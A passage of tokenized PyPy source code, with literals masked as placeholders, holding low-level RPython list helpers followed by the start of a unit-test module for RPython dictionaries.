ll_length ( ) != <NUM_LIT:0> <EOL> def ll_len_foldable ( l ) : <EOL> return l . ll_length ( ) <EOL> ll_len_foldable . oopspec = '<STR_LIT>' <EOL> def ll_list_is_true_foldable ( l ) : <EOL> return bool ( l ) and ll_len_foldable ( l ) != <NUM_LIT:0> <EOL> def ll_append ( l , newitem ) : <EOL> length = l . ll_length ( ) <EOL> l . _ll_resize_ge ( length + <NUM_LIT:1> ) <EOL> l . ll_setitem_fast ( length , newitem ) <EOL> ll_append . oopspec = '<STR_LIT>' <EOL> def ll_prepend ( l , newitem ) : <EOL> length = l . ll_length ( ) <EOL> l . _ll_resize_ge ( length + <NUM_LIT:1> ) <EOL> dst = length <EOL> while dst > <NUM_LIT:0> : <EOL> src = dst - <NUM_LIT:1> <EOL> l . ll_setitem_fast ( dst , l . ll_getitem_fast ( src ) ) <EOL> dst = src <EOL> l . ll_setitem_fast ( <NUM_LIT:0> , newitem ) <EOL> ll_prepend . oopspec = '<STR_LIT>' <EOL> def ll_concat ( RESLIST , l1 , l2 ) : <EOL> len1 = l1 . ll_length ( ) <EOL> len2 = l2 . ll_length ( ) <EOL> try : <EOL> newlength = ovfcheck ( len1 + len2 ) <EOL> except OverflowError : <EOL> raise MemoryError <EOL> l = RESLIST . ll_newlist ( newlength ) <EOL> j = <NUM_LIT:0> <EOL> while j < len1 : <EOL> l . ll_setitem_fast ( j , l1 . ll_getitem_fast ( j ) ) <EOL> j += <NUM_LIT:1> <EOL> i = <NUM_LIT:0> <EOL> while i < len2 : <EOL> l . ll_setitem_fast ( j , l2 . ll_getitem_fast ( i ) ) <EOL> i += <NUM_LIT:1> <EOL> j += <NUM_LIT:1> <EOL> return l <EOL> def ll_insert_nonneg ( l , index , newitem ) : <EOL> length = l . ll_length ( ) <EOL> ll_assert ( <NUM_LIT:0> <= index , "<STR_LIT>" ) <EOL> ll_assert ( index <= length , "<STR_LIT>" ) <EOL> l . _ll_resize_ge ( length + <NUM_LIT:1> ) <EOL> dst = length <EOL> while dst > index : <EOL> src = dst - <NUM_LIT:1> <EOL> l . ll_setitem_fast ( dst , l . ll_getitem_fast ( src ) ) <EOL> dst = src <EOL> l . ll_setitem_fast ( index , newitem ) <EOL> ll_insert_nonneg . 
oopspec = '<STR_LIT>' <EOL> def ll_pop_nonneg ( func , l , index ) : <EOL> ll_assert ( index >= <NUM_LIT:0> , "<STR_LIT>" ) <EOL> if func is dum_checkidx : <EOL> if index >= l . ll_length ( ) : <EOL> raise IndexError <EOL> else : <EOL> ll_assert ( index < l . ll_length ( ) , "<STR_LIT>" ) <EOL> res = l . ll_getitem_fast ( index ) <EOL> ll_delitem_nonneg ( dum_nocheck , l , index ) <EOL> return res <EOL> ll_pop_nonneg . oopspec = '<STR_LIT>' <EOL> def ll_pop_default ( func , l ) : <EOL> length = l . ll_length ( ) <EOL> if func is dum_checkidx and ( length == <NUM_LIT:0> ) : <EOL> raise IndexError <EOL> ll_assert ( length > <NUM_LIT:0> , "<STR_LIT>" ) <EOL> index = length - <NUM_LIT:1> <EOL> newlength = index <EOL> res = l . ll_getitem_fast ( index ) <EOL> null = ll_null_item ( l ) <EOL> if null is not None : <EOL> l . ll_setitem_fast ( index , null ) <EOL> l . _ll_resize_le ( newlength ) <EOL> return res <EOL> ll_pop_default . oopspec = '<STR_LIT>' <EOL> def ll_pop_zero ( func , l ) : <EOL> length = l . ll_length ( ) <EOL> if func is dum_checkidx and ( length == <NUM_LIT:0> ) : <EOL> raise IndexError <EOL> ll_assert ( length > <NUM_LIT:0> , "<STR_LIT>" ) <EOL> newlength = length - <NUM_LIT:1> <EOL> res = l . ll_getitem_fast ( <NUM_LIT:0> ) <EOL> j = <NUM_LIT:0> <EOL> j1 = j + <NUM_LIT:1> <EOL> while j < newlength : <EOL> l . ll_setitem_fast ( j , l . ll_getitem_fast ( j1 ) ) <EOL> j = j1 <EOL> j1 += <NUM_LIT:1> <EOL> null = ll_null_item ( l ) <EOL> if null is not None : <EOL> l . ll_setitem_fast ( newlength , null ) <EOL> l . _ll_resize_le ( newlength ) <EOL> return res <EOL> ll_pop_zero . oopspec = '<STR_LIT>' <EOL> def ll_pop ( func , l , index ) : <EOL> length = l . 
ll_length ( ) <EOL> if index < <NUM_LIT:0> : <EOL> index += length <EOL> if func is dum_checkidx : <EOL> if index < <NUM_LIT:0> or index >= length : <EOL> raise IndexError <EOL> else : <EOL> ll_assert ( index >= <NUM_LIT:0> , "<STR_LIT>" ) <EOL> ll_assert ( index < length , "<STR_LIT>" ) <EOL> res = l . ll_getitem_fast ( index ) <EOL> ll_delitem_nonneg ( dum_nocheck , l , index ) <EOL> return res <EOL> ll_pop . oopspec = '<STR_LIT>' <EOL> def ll_reverse ( l ) : <EOL> length = l . ll_length ( ) <EOL> i = <NUM_LIT:0> <EOL> length_1_i = length - <NUM_LIT:1> - i <EOL> while i < length_1_i : <EOL> tmp = l . ll_getitem_fast ( i ) <EOL> l . ll_setitem_fast ( i , l . ll_getitem_fast ( length_1_i ) ) <EOL> l . ll_setitem_fast ( length_1_i , tmp ) <EOL> i += <NUM_LIT:1> <EOL> length_1_i -= <NUM_LIT:1> <EOL> def ll_getitem_nonneg ( func , l , index ) : <EOL> ll_assert ( index >= <NUM_LIT:0> , "<STR_LIT>" ) <EOL> if func is dum_checkidx : <EOL> if index >= l . ll_length ( ) : <EOL> raise IndexError <EOL> else : <EOL> ll_assert ( index < l . ll_length ( ) , "<STR_LIT>" ) <EOL> return l . ll_getitem_fast ( index ) <EOL> ll_getitem_nonneg . oopspec = '<STR_LIT>' <EOL> def ll_getitem ( func , l , index ) : <EOL> length = l . ll_length ( ) <EOL> if index < <NUM_LIT:0> : <EOL> index += length <EOL> if func is dum_checkidx : <EOL> if index < <NUM_LIT:0> or index >= length : <EOL> raise IndexError <EOL> else : <EOL> ll_assert ( index >= <NUM_LIT:0> , "<STR_LIT>" ) <EOL> ll_assert ( index < length , "<STR_LIT>" ) <EOL> return l . ll_getitem_fast ( index ) <EOL> ll_getitem . oopspec = '<STR_LIT>' <EOL> def ll_getitem_foldable_nonneg ( func , l , index ) : <EOL> return ll_getitem_nonneg ( func , l , index ) <EOL> ll_getitem_foldable_nonneg . oopspec = '<STR_LIT>' <EOL> def ll_getitem_foldable ( func , l , index ) : <EOL> return ll_getitem ( func , l , index ) <EOL> ll_getitem_foldable . 
oopspec = '<STR_LIT>' <EOL> def ll_setitem_nonneg ( func , l , index , newitem ) : <EOL> ll_assert ( index >= <NUM_LIT:0> , "<STR_LIT>" ) <EOL> if func is dum_checkidx : <EOL> if index >= l . ll_length ( ) : <EOL> raise IndexError <EOL> else : <EOL> ll_assert ( index < l . ll_length ( ) , "<STR_LIT>" ) <EOL> l . ll_setitem_fast ( index , newitem ) <EOL> ll_setitem_nonneg . oopspec = '<STR_LIT>' <EOL> def ll_setitem ( func , l , index , newitem ) : <EOL> length = l . ll_length ( ) <EOL> if index < <NUM_LIT:0> : <EOL> index += length <EOL> if func is dum_checkidx : <EOL> if index < <NUM_LIT:0> or index >= length : <EOL> raise IndexError <EOL> else : <EOL> ll_assert ( index >= <NUM_LIT:0> , "<STR_LIT>" ) <EOL> ll_assert ( index < length , "<STR_LIT>" ) <EOL> l . ll_setitem_fast ( index , newitem ) <EOL> ll_setitem . oopspec = '<STR_LIT>' <EOL> def ll_delitem_nonneg ( func , l , index ) : <EOL> ll_assert ( index >= <NUM_LIT:0> , "<STR_LIT>" ) <EOL> length = l . ll_length ( ) <EOL> if func is dum_checkidx : <EOL> if index >= length : <EOL> raise IndexError <EOL> else : <EOL> ll_assert ( index < length , "<STR_LIT>" ) <EOL> newlength = length - <NUM_LIT:1> <EOL> j = index <EOL> j1 = j + <NUM_LIT:1> <EOL> while j < newlength : <EOL> l . ll_setitem_fast ( j , l . ll_getitem_fast ( j1 ) ) <EOL> j = j1 <EOL> j1 += <NUM_LIT:1> <EOL> null = ll_null_item ( l ) <EOL> if null is not None : <EOL> l . ll_setitem_fast ( newlength , null ) <EOL> l . _ll_resize_le ( newlength ) <EOL> ll_delitem_nonneg . oopspec = '<STR_LIT>' <EOL> def ll_delitem ( func , l , i ) : <EOL> length = l . ll_length ( ) <EOL> if i < <NUM_LIT:0> : <EOL> i += length <EOL> if func is dum_checkidx : <EOL> if i < <NUM_LIT:0> or i >= length : <EOL> raise IndexError <EOL> else : <EOL> ll_assert ( i >= <NUM_LIT:0> , "<STR_LIT>" ) <EOL> ll_assert ( i < length , "<STR_LIT>" ) <EOL> ll_delitem_nonneg ( dum_nocheck , l , i ) <EOL> ll_delitem . oopspec = '<STR_LIT>' <EOL> def ll_extend ( l1 , l2 ) : <EOL> len1 = l1 . 
ll_length ( ) <EOL> len2 = l2 . ll_length ( ) <EOL> try : <EOL> newlength = ovfcheck ( len1 + len2 ) <EOL> except OverflowError : <EOL> raise MemoryError <EOL> l1 . _ll_resize_ge ( newlength ) <EOL> i = <NUM_LIT:0> <EOL> j = len1 <EOL> while i < len2 : <EOL> l1 . ll_setitem_fast ( j , l2 . ll_getitem_fast ( i ) ) <EOL> i += <NUM_LIT:1> <EOL> j += <NUM_LIT:1> <EOL> ll_extend . oopspec = '<STR_LIT>' <EOL> def ll_extend_with_str ( lst , s , getstrlen , getstritem ) : <EOL> return ll_extend_with_str_slice_startonly ( lst , s , getstrlen , getstritem , <NUM_LIT:0> ) <EOL> def ll_extend_with_str_slice_startonly ( lst , s , getstrlen , getstritem , start ) : <EOL> len1 = lst . ll_length ( ) <EOL> len2 = getstrlen ( s ) <EOL> count2 = len2 - start <EOL> ll_assert ( start >= <NUM_LIT:0> , "<STR_LIT>" ) <EOL> assert count2 >= <NUM_LIT:0> , "<STR_LIT>" <EOL> try : <EOL> newlength = ovfcheck ( len1 + count2 ) <EOL> except OverflowError : <EOL> raise MemoryError <EOL> lst . _ll_resize_ge ( newlength ) <EOL> i = start <EOL> j = len1 <EOL> while i < len2 : <EOL> c = getstritem ( s , i ) <EOL> if listItemType ( lst ) is UniChar : <EOL> c = unichr ( ord ( c ) ) <EOL> lst . ll_setitem_fast ( j , c ) <EOL> i += <NUM_LIT:1> <EOL> j += <NUM_LIT:1> <EOL> def ll_extend_with_str_slice_startstop ( lst , s , getstrlen , getstritem , <EOL> start , stop ) : <EOL> len1 = lst . ll_length ( ) <EOL> len2 = getstrlen ( s ) <EOL> ll_assert ( start >= <NUM_LIT:0> , "<STR_LIT>" ) <EOL> ll_assert ( start <= len2 , "<STR_LIT>" ) <EOL> if stop > len2 : <EOL> stop = len2 <EOL> count2 = stop - start <EOL> assert count2 >= <NUM_LIT:0> , "<STR_LIT>" <EOL> try : <EOL> newlength = ovfcheck ( len1 + count2 ) <EOL> except OverflowError : <EOL> raise MemoryError <EOL> lst . _ll_resize_ge ( newlength ) <EOL> i = start <EOL> j = len1 <EOL> while i < stop : <EOL> c = getstritem ( s , i ) <EOL> if listItemType ( lst ) is UniChar : <EOL> c = unichr ( ord ( c ) ) <EOL> lst . 
ll_setitem_fast ( j , c ) <EOL> i += <NUM_LIT:1> <EOL> j += <NUM_LIT:1> <EOL> def ll_extend_with_str_slice_minusone ( lst , s , getstrlen , getstritem ) : <EOL> len1 = lst . ll_length ( ) <EOL> len2m1 = getstrlen ( s ) - <NUM_LIT:1> <EOL> assert len2m1 >= <NUM_LIT:0> , "<STR_LIT>" <EOL> try : <EOL> newlength = ovfcheck ( len1 + len2m1 ) <EOL> except OverflowError : <EOL> raise MemoryError <EOL> lst . _ll_resize_ge ( newlength ) <EOL> i = <NUM_LIT:0> <EOL> j = len1 <EOL> while i < len2m1 : <EOL> c = getstritem ( s , i ) <EOL> if listItemType ( lst ) is UniChar : <EOL> c = unichr ( ord ( c ) ) <EOL> lst . ll_setitem_fast ( j , c ) <EOL> i += <NUM_LIT:1> <EOL> j += <NUM_LIT:1> <EOL> def ll_extend_with_char_count ( lst , char , count ) : <EOL> if count <= <NUM_LIT:0> : <EOL> return <EOL> len1 = lst . ll_length ( ) <EOL> try : <EOL> newlength = ovfcheck ( len1 + count ) <EOL> except OverflowError : <EOL> raise MemoryError <EOL> lst . _ll_resize_ge ( newlength ) <EOL> j = len1 <EOL> if listItemType ( lst ) is UniChar : <EOL> char = unichr ( ord ( char ) ) <EOL> while j < newlength : <EOL> lst . ll_setitem_fast ( j , char ) <EOL> j += <NUM_LIT:1> <EOL> def ll_listslice_startonly ( RESLIST , l1 , start ) : <EOL> len1 = l1 . ll_length ( ) <EOL> ll_assert ( start >= <NUM_LIT:0> , "<STR_LIT>" ) <EOL> ll_assert ( start <= len1 , "<STR_LIT>" ) <EOL> newlength = len1 - start <EOL> l = RESLIST . ll_newlist ( newlength ) <EOL> j = <NUM_LIT:0> <EOL> i = start <EOL> while i < len1 : <EOL> l . ll_setitem_fast ( j , l1 . ll_getitem_fast ( i ) ) <EOL> i += <NUM_LIT:1> <EOL> j += <NUM_LIT:1> <EOL> return l <EOL> ll_listslice_startonly . _annenforceargs_ = ( None , None , int ) <EOL> def ll_listslice_startstop ( RESLIST , l1 , start , stop ) : <EOL> length = l1 . 
ll_length ( ) <EOL> ll_assert ( start >= <NUM_LIT:0> , "<STR_LIT>" ) <EOL> ll_assert ( start <= length , "<STR_LIT>" ) <EOL> ll_assert ( stop >= start , "<STR_LIT>" ) <EOL> if stop > length : <EOL> stop = length <EOL> newlength = stop - start <EOL> l = RESLIST . ll_newlist ( newlength ) <EOL> j = <NUM_LIT:0> <EOL> i = start <EOL> while i < stop : <EOL> l . ll_setitem_fast ( j , l1 . ll_getitem_fast ( i ) ) <EOL> i += <NUM_LIT:1> <EOL> j += <NUM_LIT:1> <EOL> return l <EOL> def ll_listslice_minusone ( RESLIST , l1 ) : <EOL> newlength = l1 . ll_length ( ) - <NUM_LIT:1> <EOL> ll_assert ( newlength >= <NUM_LIT:0> , "<STR_LIT>" ) <EOL> l = RESLIST . ll_newlist ( newlength ) <EOL> j = <NUM_LIT:0> <EOL> while j < newlength : <EOL> l . ll_setitem_fast ( j , l1 . ll_getitem_fast ( j ) ) <EOL> j += <NUM_LIT:1> <EOL> return l <EOL> def ll_listdelslice_startonly ( l , start ) : <EOL> ll_assert ( start >= <NUM_LIT:0> , "<STR_LIT>" ) <EOL> ll_assert ( start <= l . ll_length ( ) , "<STR_LIT>" ) <EOL> newlength = start <EOL> null = ll_null_item ( l ) <EOL> if null is not None : <EOL> j = l . ll_length ( ) - <NUM_LIT:1> <EOL> while j >= newlength : <EOL> l . ll_setitem_fast ( j , null ) <EOL> j -= <NUM_LIT:1> <EOL> l . _ll_resize_le ( newlength ) <EOL> ll_listdelslice_startonly . oopspec = '<STR_LIT>' <EOL> def ll_listdelslice_startstop ( l , start , stop ) : <EOL> length = l . ll_length ( ) <EOL> ll_assert ( start >= <NUM_LIT:0> , "<STR_LIT>" ) <EOL> ll_assert ( start <= length , "<STR_LIT>" ) <EOL> ll_assert ( stop >= start , "<STR_LIT>" ) <EOL> if stop > length : <EOL> stop = length <EOL> newlength = length - ( stop - start ) <EOL> j = start <EOL> i = stop <EOL> while j < newlength : <EOL> l . ll_setitem_fast ( j , l . ll_getitem_fast ( i ) ) <EOL> i += <NUM_LIT:1> <EOL> j += <NUM_LIT:1> <EOL> null = ll_null_item ( l ) <EOL> if null is not None : <EOL> j = length - <NUM_LIT:1> <EOL> while j >= newlength : <EOL> l . ll_setitem_fast ( j , null ) <EOL> j -= <NUM_LIT:1> <EOL> l . 
_ll_resize_le ( newlength ) <EOL> ll_listdelslice_startstop . oopspec = '<STR_LIT>' <EOL> def ll_listsetslice ( l1 , start , stop , l2 ) : <EOL> count = l2 . ll_length ( ) <EOL> ll_assert ( start >= <NUM_LIT:0> , "<STR_LIT>" ) <EOL> ll_assert ( start <= l1 . ll_length ( ) , "<STR_LIT>" ) <EOL> ll_assert ( count == stop - start , <EOL> "<STR_LIT>" ) <EOL> j = start <EOL> i = <NUM_LIT:0> <EOL> while i < count : <EOL> l1 . ll_setitem_fast ( j , l2 . ll_getitem_fast ( i ) ) <EOL> i += <NUM_LIT:1> <EOL> j += <NUM_LIT:1> <EOL> ll_listsetslice . oopspec = '<STR_LIT>' <EOL> def ll_listeq ( l1 , l2 , eqfn ) : <EOL> if not l1 and not l2 : <EOL> return True <EOL> if not l1 or not l2 : <EOL> return False <EOL> len1 = l1 . ll_length ( ) <EOL> len2 = l2 . ll_length ( ) <EOL> if len1 != len2 : <EOL> return False <EOL> j = <NUM_LIT:0> <EOL> while j < len1 : <EOL> if eqfn is None : <EOL> if l1 . ll_getitem_fast ( j ) != l2 . ll_getitem_fast ( j ) : <EOL> return False <EOL> else : <EOL> if not eqfn ( l1 . ll_getitem_fast ( j ) , l2 . ll_getitem_fast ( j ) ) : <EOL> return False <EOL> j += <NUM_LIT:1> <EOL> return True <EOL> def ll_listcontains ( lst , obj , eqfn ) : <EOL> lng = lst . ll_length ( ) <EOL> j = <NUM_LIT:0> <EOL> while j < lng : <EOL> if eqfn is None : <EOL> if lst . ll_getitem_fast ( j ) == obj : <EOL> return True <EOL> else : <EOL> if eqfn ( lst . ll_getitem_fast ( j ) , obj ) : <EOL> return True <EOL> j += <NUM_LIT:1> <EOL> return False <EOL> def ll_listindex ( lst , obj , eqfn ) : <EOL> lng = lst . ll_length ( ) <EOL> j = <NUM_LIT:0> <EOL> while j < lng : <EOL> if eqfn is None : <EOL> if lst . ll_getitem_fast ( j ) == obj : <EOL> return j <EOL> else : <EOL> if eqfn ( lst . 
ll_getitem_fast ( j ) , obj ) : <EOL> return j <EOL> j += <NUM_LIT:1> <EOL> raise ValueError <EOL> def ll_listremove ( lst , obj , eqfn ) : <EOL> index = ll_listindex ( lst , obj , eqfn ) <EOL> ll_delitem_nonneg ( dum_nocheck , lst , index ) <EOL> def ll_inplace_mul ( l , factor ) : <EOL> length = l . ll_length ( ) <EOL> if factor < <NUM_LIT:0> : <EOL> factor = <NUM_LIT:0> <EOL> try : <EOL> resultlen = ovfcheck ( length * factor ) <EOL> except OverflowError : <EOL> raise MemoryError <EOL> res = l <EOL> res . _ll_resize ( resultlen ) <EOL> j = length <EOL> while j < resultlen : <EOL> i = <NUM_LIT:0> <EOL> while i < length : <EOL> p = j + i <EOL> res . ll_setitem_fast ( p , l . ll_getitem_fast ( i ) ) <EOL> i += <NUM_LIT:1> <EOL> j += length <EOL> return res <EOL> ll_inplace_mul . oopspec = '<STR_LIT>' <EOL> def ll_mul ( RESLIST , l , factor ) : <EOL> length = l . ll_length ( ) <EOL> if factor < <NUM_LIT:0> : <EOL> factor = <NUM_LIT:0> <EOL> try : <EOL> resultlen = ovfcheck ( length * factor ) <EOL> except OverflowError : <EOL> raise MemoryError <EOL> res = RESLIST . ll_newlist ( resultlen ) <EOL> j = <NUM_LIT:0> <EOL> while j < resultlen : <EOL> i = <NUM_LIT:0> <EOL> while i < length : <EOL> p = j + i <EOL> res . ll_setitem_fast ( p , l . ll_getitem_fast ( i ) ) <EOL> i += <NUM_LIT:1> <EOL> j += length <EOL> return res </s>
<s> from pypy . translator . translator import TranslationContext <EOL> from pypy . rpython . lltypesystem import lltype , rffi <EOL> from pypy . rpython import rint <EOL> from pypy . rpython . lltypesystem import rdict , rstr <EOL> from pypy . rpython . test . tool import BaseRtypingTest , LLRtypeMixin , OORtypeMixin <EOL> from pypy . rlib . objectmodel import r_dict <EOL> from pypy . rlib . rarithmetic import r_uint , r_longlong , r_ulonglong <EOL> import py <EOL> py . log . setconsumer ( "<STR_LIT>" , py . log . STDOUT ) <EOL> def not_really_random ( ) : <EOL> """<STR_LIT>""" <EOL> import random <EOL> x = random . random ( ) <EOL> print '<STR_LIT>' % ( x , ) <EOL> for i in range ( <NUM_LIT> ) : <EOL> r = <NUM_LIT> + i / <NUM_LIT> <EOL> x = r * x - x * x <EOL> assert <NUM_LIT:0> <= x < <NUM_LIT:4> <EOL> yield x <EOL> class BaseTestRdict ( BaseRtypingTest ) : <EOL> def test_dict_creation ( self ) : <EOL> def createdict ( i ) : <EOL> d = { '<STR_LIT:hello>' : i } <EOL> return d [ '<STR_LIT:hello>' ] <EOL> res = self . interpret ( createdict , [ <NUM_LIT> ] ) <EOL> assert res == <NUM_LIT> <EOL> def test_dict_getitem_setitem ( self ) : <EOL> def func ( i ) : <EOL> d = { '<STR_LIT:hello>' : i } <EOL> d [ '<STR_LIT>' ] = i + <NUM_LIT:1> <EOL> return d [ '<STR_LIT:hello>' ] * d [ '<STR_LIT>' ] <EOL> res = self . interpret ( func , [ <NUM_LIT:6> ] ) <EOL> assert res == <NUM_LIT> <EOL> def test_dict_getitem_keyerror ( self ) : <EOL> def func ( i ) : <EOL> d = { '<STR_LIT:hello>' : i } <EOL> try : <EOL> return d [ '<STR_LIT>' ] <EOL> except KeyError : <EOL> return <NUM_LIT:0> <EOL> res = self . interpret ( func , [ <NUM_LIT:6> ] ) <EOL> assert res == <NUM_LIT:0> <EOL> def test_dict_del_simple ( self ) : <EOL> def func ( i ) : <EOL> d = { '<STR_LIT:hello>' : i } <EOL> d [ '<STR_LIT>' ] = i + <NUM_LIT:1> <EOL> del d [ '<STR_LIT:hello>' ] <EOL> return len ( d ) <EOL> res = self . 
interpret ( func , [ <NUM_LIT:6> ] ) <EOL> assert res == <NUM_LIT:1> <EOL> def test_dict_clear ( self ) : <EOL> def func ( i ) : <EOL> d = { '<STR_LIT:abc>' : i } <EOL> d [ '<STR_LIT>' ] = i + <NUM_LIT:1> <EOL> d . clear ( ) <EOL> d [ '<STR_LIT>' ] = i + <NUM_LIT:2> <EOL> return ( '<STR_LIT:abc>' not in d and '<STR_LIT>' not in d <EOL> and d [ '<STR_LIT>' ] == i + <NUM_LIT:2> and len ( d ) == <NUM_LIT:1> ) <EOL> res = self . interpret ( func , [ <NUM_LIT:7> ] ) <EOL> assert res == True <EOL> def test_empty_strings ( self ) : <EOL> def func ( i ) : <EOL> d = { '<STR_LIT>' : i } <EOL> del d [ '<STR_LIT>' ] <EOL> try : <EOL> d [ '<STR_LIT>' ] <EOL> return <NUM_LIT:0> <EOL> except KeyError : <EOL> pass <EOL> return <NUM_LIT:1> <EOL> res = self . interpret ( func , [ <NUM_LIT:6> ] ) <EOL> assert res == <NUM_LIT:1> <EOL> def func ( i ) : <EOL> d = { '<STR_LIT>' : i } <EOL> del d [ '<STR_LIT>' ] <EOL> d [ '<STR_LIT>' ] = i + <NUM_LIT:1> <EOL> return len ( d ) <EOL> res = self . interpret ( func , [ <NUM_LIT:6> ] ) <EOL> assert res == <NUM_LIT:1> <EOL> def test_dict_is_true ( self ) : <EOL> def func ( i ) : <EOL> if i : <EOL> d = { } <EOL> else : <EOL> d = { i : i + <NUM_LIT:1> } <EOL> if d : <EOL> return i <EOL> else : <EOL> return i + <NUM_LIT:1> <EOL> assert self . interpret ( func , [ <NUM_LIT> ] ) == <NUM_LIT> <EOL> assert self . interpret ( func , [ <NUM_LIT:0> ] ) == <NUM_LIT:0> <EOL> def test_contains ( self ) : <EOL> def func ( x , y ) : <EOL> d = { x : x + <NUM_LIT:1> } <EOL> return y in d <EOL> assert self . interpret ( func , [ <NUM_LIT> , <NUM_LIT:0> ] ) == False <EOL> assert self . interpret ( func , [ <NUM_LIT> , <NUM_LIT> ] ) == True <EOL> def test_dict_iteration ( self ) : <EOL> def func ( i , j ) : <EOL> d = { } <EOL> d [ '<STR_LIT:hello>' ] = i <EOL> d [ '<STR_LIT>' ] = j <EOL> k = <NUM_LIT:1> <EOL> for key in d : <EOL> k = k * d [ key ] <EOL> return k <EOL> res = self . 
interpret ( func , [ <NUM_LIT:6> , <NUM_LIT:7> ] ) <EOL> assert res == <NUM_LIT> <EOL> def test_dict_itermethods ( self ) : <EOL> def func ( ) : <EOL> d = { } <EOL> d [ '<STR_LIT:hello>' ] = <NUM_LIT:6> <EOL> d [ '<STR_LIT>' ] = <NUM_LIT:7> <EOL> k1 = k2 = k3 = <NUM_LIT:1> <EOL> for key in d . iterkeys ( ) : <EOL> k1 = k1 * d [ key ] <EOL> for value in d . itervalues ( ) : <EOL> k2 = k2 * value <EOL> for key , value in d . iteritems ( ) : <EOL> assert d [ key ] == value <EOL> k3 = k3 * value <EOL> return k1 + k2 + k3 <EOL> res = self . interpret ( func , [ ] ) <EOL> assert res == <NUM_LIT> + <NUM_LIT> + <NUM_LIT> <EOL> def test_two_dicts_with_different_value_types ( self ) : <EOL> def func ( i ) : <EOL> d1 = { } <EOL> d1 [ '<STR_LIT:hello>' ] = i + <NUM_LIT:1> <EOL> d2 = { } <EOL> d2 [ '<STR_LIT>' ] = d1 <EOL> return d2 [ '<STR_LIT>' ] [ '<STR_LIT:hello>' ] <EOL> res = self . interpret ( func , [ <NUM_LIT:5> ] ) <EOL> assert res == <NUM_LIT:6> <EOL> def test_dict_get ( self ) : <EOL> def func ( ) : <EOL> dic = { } <EOL> x1 = dic . get ( '<STR_LIT>' , <NUM_LIT> ) <EOL> dic [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> x2 = dic . get ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> return x1 * <NUM_LIT:10> + x2 <EOL> res = self . interpret ( func , ( ) ) <EOL> assert res == <NUM_LIT> <EOL> def test_dict_get_empty ( self ) : <EOL> def func ( ) : <EOL> dic = { } <EOL> x1 = dic . get ( '<STR_LIT>' , <NUM_LIT> ) <EOL> x2 = dic . get ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> return x1 * <NUM_LIT:10> + x2 <EOL> res = self . interpret ( func , ( ) ) <EOL> assert res == <NUM_LIT> <EOL> def test_dict_setdefault ( self ) : <EOL> def f ( ) : <EOL> d = { } <EOL> d . setdefault ( '<STR_LIT:a>' , <NUM_LIT:2> ) <EOL> return d [ '<STR_LIT:a>' ] <EOL> res = self . interpret ( f , ( ) ) <EOL> assert res == <NUM_LIT:2> <EOL> def f ( ) : <EOL> d = { } <EOL> d . setdefault ( '<STR_LIT:a>' , <NUM_LIT:2> ) <EOL> x = d . setdefault ( '<STR_LIT:a>' , - <NUM_LIT:3> ) <EOL> return x <EOL> res = self . 
interpret ( f , ( ) ) <EOL> assert res == <NUM_LIT:2> <EOL> def test_dict_copy ( self ) : <EOL> def func ( ) : <EOL> dic = { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT:b>' : <NUM_LIT:2> } <EOL> d2 = dic . copy ( ) <EOL> ok = <NUM_LIT:1> <EOL> for key in d2 : <EOL> if dic [ key ] != d2 [ key ] : <EOL> ok = <NUM_LIT:0> <EOL> ok &= len ( dic ) == len ( d2 ) <EOL> d2 [ '<STR_LIT:c>' ] = <NUM_LIT:3> <EOL> ok &= len ( dic ) == len ( d2 ) - <NUM_LIT:1> <EOL> return ok <EOL> res = self . interpret ( func , ( ) ) <EOL> assert res == <NUM_LIT:1> <EOL> def test_dict_update ( self ) : <EOL> def func ( ) : <EOL> dic = { '<STR_LIT>' : <NUM_LIT:1000> , '<STR_LIT:b>' : <NUM_LIT:200> } <EOL> d2 = { '<STR_LIT:b>' : <NUM_LIT:30> , '<STR_LIT>' : <NUM_LIT:4> } <EOL> dic . update ( d2 ) <EOL> ok = len ( dic ) == <NUM_LIT:3> <EOL> sum = ok <EOL> for key in dic : <EOL> sum += dic [ key ] <EOL> return sum <EOL> res = self . interpret ( func , ( ) ) <EOL> assert res == <NUM_LIT> <EOL> def test_dict_keys ( self ) : <EOL> def func ( ) : <EOL> dic = { '<STR_LIT>' : <NUM_LIT:1000> , '<STR_LIT>' : <NUM_LIT:200> } <EOL> keys = dic . keys ( ) <EOL> return ord ( keys [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] ) + ord ( keys [ <NUM_LIT:1> ] [ <NUM_LIT:1> ] ) - <NUM_LIT:2> * ord ( '<STR_LIT:0>' ) + len ( keys ) <EOL> res = self . interpret ( func , ( ) ) <EOL> assert res == <NUM_LIT> <EOL> def test_dict_inst_keys ( self ) : <EOL> class Empty : <EOL> pass <EOL> class A ( Empty ) : <EOL> pass <EOL> def func ( ) : <EOL> dic0 = { Empty ( ) : <NUM_LIT:2> } <EOL> dic = { A ( ) : <NUM_LIT:1> , A ( ) : <NUM_LIT:2> } <EOL> keys = dic . keys ( ) <EOL> return ( isinstance ( keys [ <NUM_LIT:1> ] , A ) ) * <NUM_LIT:2> + ( isinstance ( keys [ <NUM_LIT:0> ] , A ) ) <EOL> res = self . 
interpret ( func , [ ] ) <EOL> assert res == <NUM_LIT:3> <EOL> def test_dict_inst_iterkeys ( self ) : <EOL> class Empty : <EOL> pass <EOL> class A ( Empty ) : <EOL> pass <EOL> def func ( ) : <EOL> dic0 = { Empty ( ) : <NUM_LIT:2> } <EOL> dic = { A ( ) : <NUM_LIT:1> , A ( ) : <NUM_LIT:2> } <EOL> a = <NUM_LIT:0> <EOL> for k in dic . iterkeys ( ) : <EOL> a += isinstance ( k , A ) <EOL> return a <EOL> res = self . interpret ( func , [ ] ) <EOL> assert res == <NUM_LIT:2> <EOL> def test_dict_values ( self ) : <EOL> def func ( ) : <EOL> dic = { '<STR_LIT>' : <NUM_LIT:1000> , '<STR_LIT>' : <NUM_LIT:200> } <EOL> values = dic . values ( ) <EOL> return values [ <NUM_LIT:0> ] + values [ <NUM_LIT:1> ] + len ( values ) <EOL> res = self . interpret ( func , ( ) ) <EOL> assert res == <NUM_LIT> <EOL> def test_dict_inst_values ( self ) : <EOL> class A : <EOL> pass <EOL> def func ( ) : <EOL> dic = { <NUM_LIT:1> : A ( ) , <NUM_LIT:2> : A ( ) } <EOL> vals = dic . values ( ) <EOL> return ( isinstance ( vals [ <NUM_LIT:1> ] , A ) ) * <NUM_LIT:2> + ( isinstance ( vals [ <NUM_LIT:0> ] , A ) ) <EOL> res = self . interpret ( func , [ ] ) <EOL> assert res == 